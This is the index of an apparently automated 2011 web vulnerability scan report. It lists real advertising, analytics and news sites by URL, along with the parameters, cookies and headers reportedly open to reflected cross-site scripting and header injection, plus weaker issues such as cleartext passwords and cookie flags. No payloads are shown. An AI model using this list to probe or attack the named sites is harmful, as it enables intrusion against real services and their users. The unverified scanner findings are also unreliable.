XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05122011-03

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Thu May 12 08:37:03 CDT 2011.

Loading

1. HTTP header injection

1.1. http://ad.doubleclick.net/ad/pcw.main.trackingpixel/WileyShoppingAisleModuleTrackingPixel [REST URL parameter 1]

1.2. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article [REST URL parameter 1]

1.3. http://ad.doubleclick.net/adj/ars.dart/ce_gear [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

2.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

2.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

2.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

2.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

2.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

2.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

2.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

2.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

2.10. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [b parameter]

2.11. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [cid parameter]

2.12. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [count parameter]

2.13. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [cpnmodule parameter]

2.14. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [e parameter]

2.15. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [epartner parameter]

2.16. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [event parameter]

2.17. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [h parameter]

2.18. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [l parameter]

2.19. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [nd parameter]

2.20. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [o parameter]

2.21. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [oepartner parameter]

2.22. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [orh parameter]

2.23. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [p parameter]

2.24. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pdom parameter]

2.25. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pg parameter]

2.26. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pid parameter]

2.27. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pp parameter]

2.28. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [ppartner parameter]

2.29. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pt parameter]

2.30. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [ra parameter]

2.31. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [rqid parameter]

2.32. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [sg parameter]

2.33. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [site parameter]

2.34. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [sz parameter]

2.35. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [t parameter]

2.36. http://ad.doubleclick.net/adj/pcw.main.blogs/bizfeed/index [blg parameter]

2.37. http://ad.doubleclick.net/adj/pcw.main.news/products/computers/laptops/article [blg parameter]

2.38. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

2.39. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

2.40. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

2.41. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

2.42. http://adserving2.cpxinteractive.com/st [ad_size parameter]

2.43. http://adserving2.cpxinteractive.com/st [ad_size parameter]

2.44. http://adserving2.cpxinteractive.com/st [section parameter]

2.45. http://adserving2.cpxinteractive.com/st [section parameter]

2.46. http://api.freebase.com/api/trans/image_thumb/en/apple_inc [maxheight parameter]

2.47. http://api.freebase.com/api/trans/image_thumb/en/apple_inc [maxwidth parameter]

2.48. http://api.freebase.com/api/trans/image_thumb/en/apple_inc [mode parameter]

2.49. http://api.freebase.com/api/trans/image_thumb/en/gadget [maxheight parameter]

2.50. http://api.freebase.com/api/trans/image_thumb/en/gadget [maxwidth parameter]

2.51. http://api.freebase.com/api/trans/image_thumb/en/gadget [mode parameter]

2.52. http://api.freebase.com/api/trans/image_thumb/en/google [maxheight parameter]

2.53. http://api.freebase.com/api/trans/image_thumb/en/google [maxwidth parameter]

2.54. http://api.freebase.com/api/trans/image_thumb/en/google [mode parameter]

2.55. http://api.freebase.com/api/trans/image_thumb/en/google_chrome [maxheight parameter]

2.56. http://api.freebase.com/api/trans/image_thumb/en/google_chrome [maxwidth parameter]

2.57. http://api.freebase.com/api/trans/image_thumb/en/google_chrome [mode parameter]

2.58. http://api.freebase.com/api/trans/image_thumb/en/google_i_o [maxheight parameter]

2.59. http://api.freebase.com/api/trans/image_thumb/en/google_i_o [maxwidth parameter]

2.60. http://api.freebase.com/api/trans/image_thumb/en/google_i_o [mode parameter]

2.61. http://api.freebase.com/api/trans/image_thumb/en/skype [maxheight parameter]

2.62. http://api.freebase.com/api/trans/image_thumb/en/skype [maxwidth parameter]

2.63. http://api.freebase.com/api/trans/image_thumb/en/skype [mode parameter]

2.64. http://api.freebase.com/api/trans/image_thumb/en/youtube [maxheight parameter]

2.65. http://api.freebase.com/api/trans/image_thumb/en/youtube [maxwidth parameter]

2.66. http://api.freebase.com/api/trans/image_thumb/en/youtube [mode parameter]

2.67. http://apptap.scripps.com/apptap3 [app parameter]

2.68. http://apptap.scripps.com/apptap3 [app parameter]

2.69. http://apptap.scripps.com/apptap3 [path parameter]

2.70. http://apptap.scripps.com/apptap3 [site parameter]

2.71. http://apptap.scripps.com/apptap3 [site parameter]

2.72. http://apptap.scripps.com/apptap3 [title parameter]

2.73. http://apptap.scripps.com/apptap3 [title parameter]

2.74. http://apptap.scripps.com/apptap3 [topic parameter]

2.75. http://apptap.scripps.com/apptap3 [topic parameter]

2.76. http://ar.voicefive.com/b/rc.pli [func parameter]

2.77. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.78. http://b.scorecardresearch.com/beacon.js [c10 parameter]

2.79. http://b.scorecardresearch.com/beacon.js [c15 parameter]

2.80. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.81. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.82. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.83. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.84. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.85. http://button.topsy.com/widget/retweet-json [callback parameter]

2.86. http://button.topsy.com/widget/retweet-json [id parameter]

2.87. http://choices.truste.com/ca [c parameter]

2.88. http://choices.truste.com/ca [h parameter]

2.89. http://choices.truste.com/ca [iplc parameter]

2.90. http://choices.truste.com/ca [ox parameter]

2.91. http://choices.truste.com/ca [plc parameter]

2.92. http://choices.truste.com/ca [w parameter]

2.93. http://choices.truste.com/ca [zi parameter]

2.94. http://cm.npc-scripps.overture.com/js_1_0/ [css_url parameter]

2.95. http://guidepolls.about.com/urbanlegends/8140502316/poll.js [linkback parameter]

2.96. http://hits.nextstat.com/cgi-bin/wsv2.cgi [108645 parameter]

2.97. http://ib.adnxs.com/ptj [redir parameter]

2.98. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]

2.99. http://image3.pubmatic.com/AdServer/UPug [ran parameter]

2.100. http://js.revsci.net/gateway/gw.js [bpid parameter]

2.101. http://js.revsci.net/gateway/gw.js [csid parameter]

2.102. http://mads.com.com/mac-ad [&&&&&&adfile parameter]

2.103. http://mads.com.com/mac-ad [BRAND parameter]

2.104. http://mads.com.com/mac-ad [BRAND parameter]

2.105. http://mads.com.com/mac-ad [CELT parameter]

2.106. http://mads.com.com/mac-ad [SITE parameter]

2.107. http://mads.com.com/mac-ad [SITE parameter]

2.108. http://mads.com.com/mac-ad [_RGROUP parameter]

2.109. http://mads.zdnet.com/mac-ad [ADREQ&beacon parameter]

2.110. http://mads.zdnet.com/mac-ad [PAGESTATE parameter]

2.111. http://mads.zdnet.com/mac-ad [SITE parameter]

2.112. http://offers-service.cbsinteractive.com/offers/script.sc [offerId parameter]

2.113. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

2.114. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

2.115. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]

2.116. http://services.digg.com/1.0/endpoint [callback parameter]

2.117. http://services.digg.com/1.0/endpoint [method parameter]

2.118. http://services.digg.com/1.0/endpoint [name of an arbitrarily supplied request parameter]

2.119. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [bullet parameter]

2.120. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [title parameter]

2.121. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [track parameter]

2.122. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [viewmore parameter]

2.123. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

2.124. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

2.125. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 1]

2.126. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 2]

2.127. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 3]

2.128. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 4]

2.129. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 5]

2.130. http://www.pcworld.com/pcworldconnect/comment_registration [callingurl parameter]

2.131. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 [REST URL parameter 4]

2.132. http://www.zdnet.com/favicon.ico [REST URL parameter 1]

2.133. http://z.about.com/6g/ip/284/27.htm [s parameter]

2.134. http://adserving2.cpxinteractive.com/st [Referer HTTP header]

2.135. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 [Referer HTTP header]

2.136. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 [Referer HTTP header]

2.137. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

2.138. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

2.139. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

2.140. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

2.141. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

2.142. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

2.143. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

2.144. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

2.145. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

2.146. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

2.147. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

2.148. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

2.149. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

2.150. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

2.151. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

2.152. http://hits.nextstat.com/scripts/wsb.php [webStat_108645 cookie]

2.153. http://seg.sharethis.com/getSegment.php [__stid cookie]

2.154. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf [meld_sess cookie]

2.155. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf [meld_sess cookie]

2.156. http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm [jsc cookie]

3. Flash cross-domain policy

3.1. http://a.tribalfusion.com/crossdomain.xml

3.2. http://ad-emea.doubleclick.net/crossdomain.xml

3.3. http://ad.doubleclick.net/crossdomain.xml

3.4. http://ajax.googleapis.com/crossdomain.xml

3.5. http://altfarm.mediaplex.com/crossdomain.xml

3.6. http://ar.voicefive.com/crossdomain.xml

3.7. http://b.scorecardresearch.com/crossdomain.xml

3.8. http://b.voicefive.com/crossdomain.xml

3.9. http://bs.serving-sys.com/crossdomain.xml

3.10. http://cdn.eyewonder.com/crossdomain.xml

3.11. http://cdn.gigya.com/crossdomain.xml

3.12. http://core.insightexpressai.com/crossdomain.xml

3.13. http://ds.serving-sys.com/crossdomain.xml

3.14. http://feeds.delicious.com/crossdomain.xml

3.15. http://gscounters.gigya.com/crossdomain.xml

3.16. http://js.revsci.net/crossdomain.xml

3.17. http://mashable.com/crossdomain.xml

3.18. http://ping.crowdscience.com/crossdomain.xml

3.19. http://pix04.revsci.net/crossdomain.xml

3.20. http://pixel.quantserve.com/crossdomain.xml

3.21. http://s.gravatar.com/crossdomain.xml

3.22. http://static.crowdscience.com/crossdomain.xml

3.23. http://tags.bluekai.com/crossdomain.xml

3.24. http://tags.crwdcntrl.net/crossdomain.xml

3.25. http://www.pcworld.com/crossdomain.xml

3.26. http://adx.g.doubleclick.net/crossdomain.xml

3.27. http://googleads.g.doubleclick.net/crossdomain.xml

3.28. http://mads.com.com/crossdomain.xml

3.29. http://mads.zdnet.com/crossdomain.xml

3.30. http://network.alluremedia.com.au/crossdomain.xml

3.31. http://pubads.g.doubleclick.net/crossdomain.xml

3.32. http://services.digg.com/crossdomain.xml

3.33. http://static.ak.fbcdn.net/crossdomain.xml

3.34. http://tags.gawker.com/crossdomain.xml

3.35. http://www.facebook.com/crossdomain.xml

3.36. http://www.stumbleupon.com/crossdomain.xml

3.37. http://www.youtube.com/crossdomain.xml

3.38. http://www.zdnet.com/crossdomain.xml

4. Silverlight cross-domain policy

4.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml

4.2. http://ad.doubleclick.net/clientaccesspolicy.xml

4.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

4.4. http://b.voicefive.com/clientaccesspolicy.xml

4.5. http://cdn.eyewonder.com/clientaccesspolicy.xml

5. Cleartext submission of password

5.1. http://crenk.com/buy-chromebook/

5.2. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

5.3. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

5.4. http://www.pcworld.com/pcworldconnect/comment_registration

6. Session token in URL

6.1. http://l.sharethis.com/pview

6.2. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/ps/ifr

6.3. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

6.4. http://www.facebook.com/extern/login_status.php

7. Password field submitted using GET method

8. Cookie scoped to parent domain

8.1. http://api.twitter.com/1/statuses/user_timeline.json

8.2. http://t.mookie1.com/t/v1/imp

8.3. http://www.imdb.com/title/tt0758746/

8.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

8.5. http://a.tribalfusion.com/displayAd.js

8.6. http://a.tribalfusion.com/j.ad

8.7. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp

8.8. http://ads.adbrite.com/adserver/behavioral-data/8201

8.9. http://ads.adbrite.com/adserver/behavioral-data/8203

8.10. http://ads.pointroll.com/PortalServe/

8.11. http://ads.revsci.net/adserver/ako

8.12. http://ads.revsci.net/adserver/ako

8.13. http://adx.adnxs.com/mapuid

8.14. http://altfarm.mediaplex.com/ad/tr/10759-119438-1104-0

8.15. http://analytics.apnewsregistry.com/analytics/v2/image.svc/ECP/MAI/ecp_271515_2011-05-12T000000-0500/RWS/www.courierpress.com/PC/Basic/

8.16. http://analytics.apnewsregistry.com/analytics/v2/image.svc/woc_lyons/RWS/www.mysuburbanlife.com/CAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/CVI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd705-11-2011-0500CDT/MAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/E/prod/PC/Basic/AT/A

8.17. http://ar.voicefive.com/b/wc_beacon.pli

8.18. http://ar.voicefive.com/bmx3/broker.pli

8.19. http://ar.voicefive.com/bmx3/broker.pli

8.20. http://as.casalemedia.com/j

8.21. http://as.casalemedia.com/j

8.22. http://as.casalemedia.com/s

8.23. http://b.scorecardresearch.com/b

8.24. http://b.scorecardresearch.com/p

8.25. http://b.scorecardresearch.com/r

8.26. http://b.voicefive.com/b

8.27. http://badge.facebook.com/badge/10042561111.528147018.1934312001.png

8.28. http://badge.facebook.com/badge/111279988891248.528147018.678371001.png

8.29. http://bcp.crwdcntrl.net/4/c=313%7Crand=255852379%7Cpv=y%7Crt=ifr

8.30. http://bcp.crwdcntrl.net/4/c=416%7Crand=357735581%7Cpv=y%7Cint=%23OpR%2311286%23Article%20%3A%20%7Cint=%23OpR%2311373%23Article%20%3A%20%20%3A%20%7Cint=%23OpR%2311668%23Article%20Categories%20%3A%20You%20are%20hereNational%20/%20Sports%20/%20Fight%20Sports%7Cmed=%23OpR%2311667%23Article%20%3A%20Sports%20%3A%20Fight%20Sports%7Casync=y%7Crt=ifr

8.31. http://bidder.mathtag.com/iframe/notify

8.32. http://bs.serving-sys.com/BurstingPipe/adServer.bs

8.33. http://bstats.adbrite.com/click/bstats.gif

8.34. http://cm.npc-gatehouse.overture.com/js_1_0/

8.35. http://cm.npc-scripps.overture.com/js_1_0/

8.36. http://core.insightexpressai.com/adServer/adServerESI.aspx

8.37. http://dw.zdnet.com/clear/c.gif

8.38. http://ewsnewspapers.112.2o7.net/b/ss/ews.h.evansville/1/H.22.1/s22444411469623

8.39. http://hits.nextstat.com/cgi-bin/wsv2.cgi

8.40. http://hits.nextstat.com/scripts/wsb.php

8.41. http://ib.adnxs.com/ptj

8.42. http://ib.adnxs.com/seg

8.43. http://image2.pubmatic.com/AdServer/Pug

8.44. http://image3.pubmatic.com/AdServer/UPug

8.45. http://js.revsci.net/gateway/gw.js

8.46. http://load.exelator.com/load/

8.47. http://loadm.exelator.com/load/

8.48. http://loadus.exelator.com/load/

8.49. http://m.adnxs.com/msftcookiehandler

8.50. http://map.media6degrees.com/orbserv/hbpix

8.51. http://odb.outbrain.com/utils/get

8.52. http://odb.outbrain.com/utils/ping.html

8.53. http://p.brilig.com/contact/bct

8.54. http://pbid.pro-market.net/engine

8.55. http://pc2.yumenetworks.com/dynamic_btx/115_89795

8.56. http://ping.crowdscience.com/ping.js

8.57. http://pix04.revsci.net/D08734/a1/0/0/0.gif

8.58. http://pix04.revsci.net/D08734/a3/0/3/0.gif

8.59. http://pix04.revsci.net/G07610/b3/0/3/1003161/269685231.gif

8.60. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

8.61. http://pix04.revsci.net/K05540/b3/0/3/1003161/572935433.js

8.62. http://pixel.mathtag.com/data/img

8.63. http://pixel.quantserve.com/pixel

8.64. http://pixel.quantserve.com/pixel/p-444Ux5EmpXDp6.gif

8.65. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

8.66. http://pixel.quantserve.com/seg/r

8.67. http://r.openx.net/set

8.68. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

8.69. http://r1-ads.ace.advertising.com/site=755601/size=728090/u=2/bnum=1468728/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fad.yieldmanager.com%252Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D621649

8.70. http://rcm.amazon.com/e/cm

8.71. http://showadsak.pubmatic.com/AdServer/AdServerServlet

8.72. http://stats.examiner.com/b/ss/examinercom/1/H.21/s24557034953031

8.73. http://sync.mathtag.com/sync/img

8.74. http://t.invitemedia.com/track_imp

8.75. http://tags.bluekai.com/site/2989

8.76. http://tags.bluekai.com/site/3307

8.77. http://tags.bluekai.com/site/3319

8.78. http://tags.bluekai.com/site/450

8.79. http://uts.amazon.com/uts/IaR

8.80. http://www.crowdsavings.com/r/banner/170x170/milehighonthecheap

8.81. http://www.facebook.com/profile/pic.php

8.82. http://www.youtube.com/embed/TVqe8ieqz10

8.83. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

8.84. http://www2.warnerbros.com/all/us/omniture/s_code_wbrostheatricaldomesticdvd.js

9. Cookie without HttpOnly flag set

9.1. http://crenk.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/securimage_show.php

9.2. http://mysuburbanlife.mycapture.com/mycapture/scripts/remote.asp

9.3. http://t.mookie1.com/t/v1/imp

9.4. http://www.crowdsavings.com/r/banner/170x170/milehighonthecheap

9.5. http://www.imdb.com/title/tt0758746/

9.6. http://www.pcworld.com/articleComment/get.do

9.7. http://www.pcworld.com/articleVote/get.do

9.8. http://www.pcworld.com/pcworldconnect/a

9.9. http://www.pcworld.com/pcworldconnect/comment_registration

9.10. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

9.11. http://a.tribalfusion.com/displayAd.js

9.12. http://a.tribalfusion.com/j.ad

9.13. http://a1.interclick.com/getInPageJSProcess.aspx

9.14. http://a1.interclick.com/getInPageJSProcess.aspx

9.15. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp

9.16. http://ad.yieldmanager.com/imp

9.17. http://ad.yieldmanager.com/pixel

9.18. http://ads.adbrite.com/adserver/behavioral-data/8201

9.19. http://ads.adbrite.com/adserver/behavioral-data/8203

9.20. http://ads.cpxadroit.com/adserver/10-3QKLX5UTS2G94.cpxad

9.21. http://ads.pointroll.com/PortalServe/

9.22. http://ads.revsci.net/adserver/ako

9.23. http://ads.revsci.net/adserver/ako

9.24. http://ads.undertone.com/aj

9.25. http://ads.undertone.com/fc.php

9.26. http://ads.undertone.com/l

9.27. http://ads.undertone.com/l

9.28. http://altfarm.mediaplex.com/ad/tr/10759-119438-1104-0

9.29. http://analytics.apnewsregistry.com/analytics/v2/image.svc/ECP/MAI/ecp_271515_2011-05-12T000000-0500/RWS/www.courierpress.com/PC/Basic/

9.30. http://analytics.apnewsregistry.com/analytics/v2/image.svc/woc_lyons/RWS/www.mysuburbanlife.com/CAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/CVI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd705-11-2011-0500CDT/MAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/E/prod/PC/Basic/AT/A

9.31. http://apex.com.com/aws/rest/v1.0/offerScript

9.32. http://api.twitter.com/1/statuses/user_timeline.json

9.33. http://ar.voicefive.com/b/wc_beacon.pli

9.34. http://ar.voicefive.com/bmx3/broker.pli

9.35. http://ar.voicefive.com/bmx3/broker.pli

9.36. http://as.casalemedia.com/j

9.37. http://as.casalemedia.com/j

9.38. http://as.casalemedia.com/s

9.39. http://b.scorecardresearch.com/b

9.40. http://b.scorecardresearch.com/p

9.41. http://b.scorecardresearch.com/r

9.42. http://b.voicefive.com/b

9.43. http://badge.facebook.com/badge/10042561111.528147018.1934312001.png

9.44. http://badge.facebook.com/badge/111279988891248.528147018.678371001.png

9.45. http://bcp.crwdcntrl.net/4/c=313%7Crand=255852379%7Cpv=y%7Crt=ifr

9.46. http://bcp.crwdcntrl.net/4/c=416%7Crand=357735581%7Cpv=y%7Cint=%23OpR%2311286%23Article%20%3A%20%7Cint=%23OpR%2311373%23Article%20%3A%20%20%3A%20%7Cint=%23OpR%2311668%23Article%20Categories%20%3A%20You%20are%20hereNational%20/%20Sports%20/%20Fight%20Sports%7Cmed=%23OpR%2311667%23Article%20%3A%20Sports%20%3A%20Fight%20Sports%7Casync=y%7Crt=ifr

9.47. http://bidder.mathtag.com/iframe/notify

9.48. http://bpx.a9.com/ads/getad

9.49. http://bs.serving-sys.com/BurstingPipe/adServer.bs

9.50. http://bstats.adbrite.com/click/bstats.gif

9.51. http://cm.npc-gatehouse.overture.com/js_1_0/

9.52. http://cm.npc-scripps.overture.com/js_1_0/

9.53. http://core.insightexpressai.com/adServer/adServerESI.aspx

9.54. http://crenk.com/buy-chromebook/

9.55. http://csc.beap.ad.yieldmanager.net/i

9.56. http://dw.zdnet.com/clear/c.gif

9.57. http://ewsnewspapers.112.2o7.net/b/ss/ews.h.evansville/1/H.22.1/s22444411469623

9.58. http://hits.nextstat.com/cgi-bin/wsv2.cgi

9.59. http://hits.nextstat.com/scripts/wsb.php

9.60. http://image2.pubmatic.com/AdServer/Pug

9.61. http://image3.pubmatic.com/AdServer/UPug

9.62. http://js.revsci.net/gateway/gw.js

9.63. http://load.exelator.com/load/

9.64. http://loadm.exelator.com/load/

9.65. http://loadus.exelator.com/load/

9.66. http://map.media6degrees.com/orbserv/hbpix

9.67. http://network.alluremedia.com.au/network/www/delivery/afr.php

9.68. http://network.alluremedia.com.au/network/www/delivery/ajs.php

9.69. http://network.alluremedia.com.au/network/www/delivery/lg.php

9.70. http://odb.outbrain.com/utils/get

9.71. http://odb.outbrain.com/utils/ping.html

9.72. http://open.ad.yieldmanager.net/a1

9.73. http://p.brilig.com/contact/bct

9.74. http://pbid.pro-market.net/engine

9.75. http://pc2.yumenetworks.com/dynamic_btx/115_89795

9.76. http://ping.crowdscience.com/ping.js

9.77. http://pix04.revsci.net/D08734/a1/0/0/0.gif

9.78. http://pix04.revsci.net/D08734/a3/0/3/0.gif

9.79. http://pix04.revsci.net/G07610/b3/0/3/1003161/269685231.gif

9.80. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

9.81. http://pix04.revsci.net/K05540/b3/0/3/1003161/572935433.js

9.82. http://pixel.mathtag.com/data/img

9.83. http://pixel.quantserve.com/pixel

9.84. http://pixel.quantserve.com/pixel/p-444Ux5EmpXDp6.gif

9.85. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

9.86. http://pixel.quantserve.com/seg/r

9.87. http://r.openx.net/set

9.88. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

9.89. http://r1-ads.ace.advertising.com/site=755601/size=728090/u=2/bnum=1468728/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fad.yieldmanager.com%252Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D621649

9.90. http://rcm.amazon.com/e/cm

9.91. http://showadsak.pubmatic.com/AdServer/AdServerServlet

9.92. http://stats.examiner.com/b/ss/examinercom/1/H.21/s24557034953031

9.93. http://statse.webtrendslive.com/dcshk2h3ouz5bdzhx6ilj0lvi_2m1v/dcs.gif

9.94. http://sync.mathtag.com/sync/img

9.95. http://t.invitemedia.com/track_imp

9.96. http://tags.bluekai.com/site/2989

9.97. http://tags.bluekai.com/site/3307

9.98. http://tags.bluekai.com/site/3319

9.99. http://tags.bluekai.com/site/450

9.100. http://tenzing.fmpub.net/

9.101. http://uts.amazon.com/uts/IaR

9.102. http://warnerbros.112.2o7.net/b/ss/wbrostheatricaldomesticdvd/1/H.15.1/s23239967282861

9.103. http://www.blogged.com/icons/vn_reganl_8165.gif

9.104. http://www.etracker.de/cnt.php

9.105. http://www.facebook.com/profile/pic.php

9.106. http://www.greenfieldreporter.com/view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/

9.107. http://www.milehighonthecheap.com/wp-content/plugins/anti-captcha/anti-captcha-0.2.js.php

9.108. http://www.milehighonthecheap.com/wp-content/themes/atahualpa353/images/favicon/cities.ico

9.109. http://www.youtube.com/embed/TVqe8ieqz10

9.110. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

9.111. http://www2.warnerbros.com/all/us/omniture/s_code_wbrostheatricaldomesticdvd.js

10. Password field with autocomplete enabled

10.1. http://crenk.com/buy-chromebook/

10.2. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

10.3. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

10.4. http://www.pcworld.com/pcworldconnect/comment_registration

11. Referer-dependent response

11.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

11.2. http://ad.yieldmanager.com/imp

11.3. http://ads.adbrite.com/adserver/behavioral-data/8201

11.4. http://ads.adbrite.com/adserver/behavioral-data/8203

11.5. http://adserving2.cpxinteractive.com/st

11.6. http://api.twitter.com/1/statuses/user_timeline.json

11.7. http://bstats.adbrite.com/click/bstats.gif

11.8. http://csi.gstatic.com/csi

11.9. http://mads.com.com/mac-ad

11.10. http://network.alluremedia.com.au/network/www/delivery/afr.php

11.11. http://vimeo.com/moogaloop.swf

11.12. http://www.facebook.com/plugins/activity.php

11.13. http://www.facebook.com/plugins/like.php

